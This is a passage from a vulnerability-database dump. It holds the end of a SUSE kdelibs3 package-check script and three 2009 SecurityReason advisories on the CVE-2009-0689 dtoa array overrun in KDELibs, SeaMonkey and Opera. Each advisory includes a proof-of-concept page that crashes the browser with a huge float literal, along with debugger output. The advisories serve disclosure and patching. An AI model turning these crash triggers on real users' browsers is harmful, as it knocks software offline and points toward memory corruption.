reference:\"kdelibs3-arts-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"kdelibs3-devel-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"kdelibs3-doc-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"kdelibs3-arts-32bit-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"kdelibs3-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"kdelibs3-arts-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"kdelibs3-devel-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"kdelibs3-doc-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"kdelibs3-32bit-3.5.1-49.53.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"kdelibs3-arts-32bit-3.5.1-49.53.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:24", "description": "\nKDE KDELibs 4.3.3 - Remote Array Overrun", "edition": 1, "published": "2009-11-19T00:00:00", "title": "KDE KDELibs 4.3.3 - Remote Array Overrun", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EXPLOITPACK:16C37B6C3C517D65315351878DA06F27", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]\n\nAuthor: Maksymilian Arciemowicz and sp3x\nhttp://SecurityReason.com\nDate:\n- - Dis.: 07.05.2009\n- - Pub.: 20.11.2009\n\nCVE: CVE-2009-0689\nRisk: High\nRemote: Yes\n\nAffected Software:\n- - KDELibs 4.3.3\n\nNOTE: Prior versions may also be affected.\n\nOriginal URL:\nhttp://securityreason.com/achievement_securityalert/74\n\n\n- --- 0.Description ---\nKDELibs is a collection of libraries built on top of Qt that provides\nframeworks and functionality for developers of KDE-compatible software.\nThe KDELibs libraries are licensed under LGPL.\n\n\n- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code\nexecution) ---\nThe main problem exist in dtoa implementation. KDE has a very similar\ndtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist\nin dtoa.cpp file\n\nhttp://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup\n\nand it is the same like SREASONRES:20090625.\n\nhttp://securityreason.com/achievement_securityalert/63\n\nbut fix for SREASONRES:20090625, used by openbsd was not good.\nMore information about fix for openbsd and similars SREASONRES:20091030,\n\nhttp://securityreason.com/achievement_securityalert/69\n\nWe can create any number of float, which will overwrite the memory. In\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and\nit is possible to call 16<= elements of freelist array.\n\n\n- --- 2. Proof of Concept (PoC) ---\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\n</script>\n- -----------------------\n\nIf we use konqueror to see this PoC, konqueror will crash. For example\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\n</script>\n- -----------------------\n\nProgram received signal SIGSEGV, Segmentation fault.\n[Switching to process 24845, thread 0x7e6e6800]\n0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\n\n0x06db85c3 <diff+163>: mov %esi,(%ecx)\n\n#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\n#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0\n#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0\n#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0\n#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0\n#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0\n#6 0x0908337f in KJS::InterpreterImp::evaluate ()\n\n(gdb) i r\neax 0x0 0\necx 0x220ff000 571469824\nedx 0x0 0\nebx 0x220fbb00 571456256\nesp 0xcfbc04e0 0xcfbc04e0\nebp 0xcfbc0518 0xcfbc0518\nesi 0xc71c71c7 -954437177\nedi 0x0 0\neip 0x21415c3 0x21415c3\n\nesi=0x71c71c7\n\n\n- --- 3. SecurityReason Note ---\n\nOfficialy SREASONRES:20090625 has been detected in:\n- - OpenBSD\n- - NetBSD\n- - FreeBSD\n- - MacOSX\n- - Google Chrome\n- - Mozilla Firefox\n- - Mozilla Seamonkey\n- - KDE (example: konqueror)\n- - Opera\n- - K-Meleon\n\nThis list is not yet closed. US-CERT declared that will inform all\nvendors about this issue, however, they did not do it. Even greater\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\nwas aware that the problem affects other products like ( KDE, Chrome )\nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation\nSecurity Advisory\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\nwas updated with note :\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\nessentially the same as that reported against the libc gdtoa routine by\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\njavascript (from Secunia), forced us to official notification all other\nvendors. We publish all the individual advisories, to formally show all\nvulnerable software and to avoid wrong CVE number. We do not see any\nother way to fix this issue in all products.\n\n\n- --- 4. Fix ---\nNetBSD fix (optimal):\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\n\nOpenBSD fix:\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\n\n\n- --- 5. Credits ---\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\n\n\n- --- 6. Greets ---\nInfospec p_e_a pi3\n\n\n- --- 7. Contact ---\nEmail:\n- - cxib {a.t] securityreason [d0t} com\n- - sp3x {a.t] securityreason [d0t} com\n\nGPG:\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\n- - http://securityreason.com/key/sp3x.gpg\n\nhttp://securityreason.com/\nhttp://securityreason.pl/\n\n\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAksF4lEACgkQpiCeOKaYa9ZD+ACfSoaEiTeQrFDgtcHgOckyXMom\nTE4AoJW3meP7KP6Xb7KNErVlsluLUO8E\n=jTmp\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:47", "description": "\nSeaMonkey 1.1.8 - Remote Array Overrun", "edition": 1, "published": "2009-11-19T00:00:00", "title": "SeaMonkey 1.1.8 - Remote Array Overrun", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EXPLOITPACK:A769E84172D8627C1FB28EFC5E28E482", "href": "", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/221\n\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]\n\nAuthor: Maksymilian Arciemowicz and sp3x\nhttp://SecurityReason.com\nDate:\n- - Dis.: 07.05.2009\n- - Pub.: 20.11.2009\n\nCVE: CVE-2009-0689\nRisk: High\nRemote: Yes\n\nAffected Software:\n- - SeaMonkey 1.1.18\n\nFixed in:\n- - SeaMonkey 2.0\n\nNOTE: Prior versions may also be affected.\n\nOriginal URL:\nhttp://securityreason.com/achievement_securityalert/71\n\n\n- --- 0.Description ---\nThe SeaMonkey project is a community effort to develop the SeaMonkey\nall-in-one internet application suite (see below). Such a software suite\nwas previously made popular by Netscape and Mozilla, and the SeaMonkey\nproject continues to develop and deliver high-quality updates to this\nconcept. Containing an Internet browser, email & newsgroup client with\nan included web feed reader, HTML editor, IRC chat and web development\ntools, SeaMonkey is sure to appeal to advanced users, web developers and\ncorporate users.\n\n\n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code\nexecution) ---\nThe main problem exist in dtoa implementation. SeaMonkey has the same\ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in\nFirefox 3.5.4 and fix\n\nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42\n\nhas been used to patch SeaMonkey 2.0.\n\nThis flaw has been detected in may 2009 and signed SREASONRES:20090625.\n\nhttp://securityreason.com/achievement_securityalert/63\n\nbut fix for SREASONRES:20090625, used by openbsd was not good.\nMore information about fix for openbsd and similars SREASONRES:20091030,\n\nhttp://securityreason.com/achievement_securityalert/69\n\nWe can create any number of float, which will overwrite the memory. In\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\nis possible to call 16<= elements of freelist array.\n\n\n- --- 2. Proof of Concept (PoC) ---\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\n</script>\n- -----------------------\n\nIf we use SeaMonkey to see this PoC, SeaMonkey will crash. For example\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\n</script>\n- -----------------------\n\n127# gdb seamonkey-bin seamonkey-bin.core\n...\n#0 0x28df0ecb in ?? ()\n...\n(gdb) i r\neax 0x0 0\necx 0x2 2\nedx 0xbfbfd2fc -1077947652\nebx 0x28da9b6c 685415276\nesp 0xbfbfd2ac 0xbfbfd2ac\nebp 0xbfbfd2c8 0xbfbfd2c8\nesi 0xb 11\nedi 0xb 11\neip 0x28df0ecb 0x28df0ecb\n...\n\nesi = esi = 11\n\n\n- --- 3. SecurityReason Note ---\n\nOfficialy SREASONRES:20090625 has been detected in:\n- - OpenBSD\n- - NetBSD\n- - FreeBSD\n- - MacOSX\n- - Google Chrome\n- - Mozilla Firefox\n- - Mozilla Seamonkey\n- - KDE (example: konqueror)\n- - Opera\n- - K-Meleon\n\nThis list is not yet closed. US-CERT declared that will inform all\nvendors about this issue, however, they did not do it. Even greater\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\nwas aware that the problem affects other products like ( KDE, Chrome )\nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation\nSecurity Advisory\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\nwas updated with note :\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\nessentially the same as that reported against the libc gdtoa routine by\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\njavascript (from Secunia), forced us to official notification all other\nvendors. We publish all the individual advisories, to formally show all\nvulnerable software and to avoid wrong CVE number. We do not see any\nother way to fix this issue in all products.\n\nPlease note:\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa\nalgorithm is not optimal and allows remote Denial of Service in Firefox\n3.5.5 giving long float number.\n\n\n- --- 4. Fix ---\nNetBSD fix (optimal):\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\n\nOpenBSD fix:\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\n\n\n- --- 5. Credits ---\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\n\n\n- --- 6. Greets ---\nInfospec p_e_a pi3\n\n\n- --- 7. Contact ---\nEmail:\n- - cxib {a.t] securityreason [d0t} com\n- - sp3x {a.t] securityreason [d0t} com\n\nGPG:\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\n- - http://securityreason.com/key/sp3x.gpg\n\nhttp://securityreason.com/\nhttp://securityreason.pl/\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D\nZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB\n=JY6k\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpera 10.01 - Remote Array Overrun", "edition": 1, "published": "2009-11-19T00:00:00", "title": "Opera 10.01 - Remote Array Overrun", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EXPLOITPACK:BAEE9A0461F7CC4E4B3568E7D096BEFB", "href": "", "sourceData": "From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/223\n\n[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]\n\nAuthor: Maksymilian Arciemowicz and sp3x\nhttp://SecurityReason.com\nDate:\n- - Dis.: 07.05.2009\n- - Pub.: 20.11.2009\n\nCVE: CVE-2009-0689\nRisk: High\nRemote: Yes\n\nAffected Software:\n- - Opera 10.01\n- - Opera 10.10 Beta\n\nNOTE: Prior versions may also be affected.\n\nOriginal URL:\nhttp://securityreason.com/achievement_securityalert/73\n\n\n- --- 0.Description ---\nOpera is a Web browser and Internet suite developed by the Opera\nSoftware company. The browser handles common Internet-related tasks such\nas displaying Web sites, sending and receiving e-mail messages, managing\ncontacts, IRC online chatting, downloading files via BitTorrent, and\nreading Web feeds. Opera is offered free of charge for personal\ncomputers and mobile phones.\n\n\n- --- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---\nThe main problem exist in dtoa implementation. Opera has a very similar\ndtoa algorithm to the BSD, Chrome and Mozilla products. It is the same\nissue like SREASONRES:20090625.\n\nhttp://securityreason.com/achievement_securityalert/63\n\nbut fix for SREASONRES:20090625, used by openbsd was not good.\nMore information about fix for openbsd and similars SREASONRES:20091030,\n\nhttp://securityreason.com/achievement_securityalert/69\n\nWe can create any number of float, which will overwrite the memory. In\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it\nis possible to call 16<= elements of freelist array.\n\n\n- --- 2. Proof of Concept (PoC) ---\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\n</script>\n- -----------------------\n\nIf we use Opera to see this PoC, Opera will crash. For example\n\n- -----------------------\n<script>\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\n</script>\n- -----------------------\n\nOPERA-CRASHLOG V1 desktop 10.01 1844 windows\nOpera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000)\n\nRegisters:\nEAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC\nEDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202\nCS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000\nFPU stack:\nC020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800\n3FC78000000000000000 10000000000100000000 0BBE0000000000040000\n00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F\n\n127# gdb -q opera opera.core\n...\nProgram terminated with signal 11, Segmentation fault.\n#0 0x2960307b in ?? ()\n...\n(gdb) i r\neax 0x71c71c71 1908874353\necx 0x2aa03be4 715144164\nedx 0x0 0\nebx 0x296177f8 694253560\nesp 0xbfbfb650 0xbfbfb650\nebp 0xbfbfb698 0xbfbfb698\nesi 0x2962d000 694341632\nedi 0x0 0\neip 0x2960307b 0x2960307b\n...\n(gdb) x/100x ($esi)-90\n0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\n0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\n0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7\n0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71\n0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c\n0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at\naddress 0x2962cffe\n...\n\n\n- --- 3. SecurityReason Note ---\n\nOfficialy SREASONRES:20090625 has been detected in:\n- - OpenBSD\n- - NetBSD\n- - FreeBSD\n- - MacOSX\n- - Google Chrome\n- - Mozilla Firefox\n- - Mozilla Seamonkey\n- - KDE (example: konqueror)\n- - Opera\n- - K-Meleon\n\nThis list is not yet closed. US-CERT declared that will inform all\nvendors about this issue, however, they did not do it. Even greater\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\nwas aware that the problem affects other products like ( KDE, Chrome )\nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation\nSecurity Advisory\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\nwas updated with note :\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\nessentially the same as that reported against the libc gdtoa routine by\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\njavascript (from Secunia), forced us to official notification all other\nvendors. We publish all the individual advisories, to formally show all\nvulnerable software and to avoid wrong CVE number. We do not see any\nother way to fix this issue in all products.\n\n\n- --- 4. Fix ---\nOpera fix:\nThe vulnerability was fixed in the latest release candidate Opera RC3 :\nhttp://snapshot.opera.com/windows/Opera_1010_1890_in.exe\nIn shortly time we can expect the final verion of Opera with the fix.\n\nNetBSD fix (optimal):\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\n\nOpenBSD fix:\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\nhttp://www.openbsd.org/cgi-bin/cvs